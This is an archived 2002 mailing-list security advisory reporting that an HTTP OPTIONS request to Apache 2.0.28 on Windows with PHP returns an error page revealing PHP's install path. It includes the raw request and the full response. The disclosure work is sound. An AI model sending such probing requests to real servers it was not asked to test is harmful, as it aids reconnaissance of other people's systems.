PHP Advisory #2

From: Paul Brereton (brereton_paul@btopenworld.com)
Date: 02/07/02


From: "Paul Brereton" <brereton_paul@btopenworld.com>
To: <bugs@securitytracker.com>, <webmaster@hideaway.net>, <contact@securitybugware.org>, <exploit@nstalker.com>, <security@winnetmag.com>, <editors@apacheweek.com>, <bugtraq@securityfocus.com>
Date: Thu, 7 Feb 2002 12:03:00 -0000

Title : PHP Reveals True Path (OPTIONS)
Author : Paul Brereton
E-Mail : brereton_paul@btopenworld.com

Summary : When a web administrator installs Apache with PHP and adds
index.php to the Apache configuration file, Apache first looks for index.php
when sending back the default web page for this directory. This opens up a
security weakness that allows remote attackers to gain sensitive information
about the directory structure of the Apache and PHP installation.

Details :Sending an OPTIONS request to the web server reveals the
installation path of PHP.

Example:
The OPTIONS output is show here:

> OPTIONS / HTTP/1.1
> Host: 192.168.1.2
> Accept: */*

< HTTP/1.1 500 Internal Server Error
< Date: Sun, 03 Feb 2002 10:56:53 GMT
< Server: Apache/2.0.28 (Win32)
< Vary: accept-language
< Accept-Ranges: bytes
< Content-Length: 680
< Connection: close
< Content-Type: text/html; charset=ISO-8859-1

< <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< <HTML>
< <HEAD>
< <TITLE>Server error!</TITLE>
< <LINK REV="made" HREF="mailto:admin@192.168.1.2">
< </HEAD>
<
< <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC">
< <H1>Server error!</H1>
< <DL>
< <DD>
<
<
<
< handler "cgi-script" not found for: C:/php/php.exe
<
<
< </DL><DL><DD>
<If you think this is a server error, please contact
<the <A HREF="mailto:admin@192.168.1.2">Webmaster</A>
<
< </DL>
<
< <H2>Error 500</H2>
< <DL>
< <DD>
< <ADDRESS>
< 192.168.1.2
< <BR>
<
< <small>02/03/02 10:56:53</small>
< <BR>
< <small>Apache/2.0.28 (Win32)</small>
< </ADDRESS>
< </DL>
< </BODY>
< </HTML>
<

As you can see the line " handler "cgi-script" not found for: C:/php/php.exe
" reveals the install path of PHP.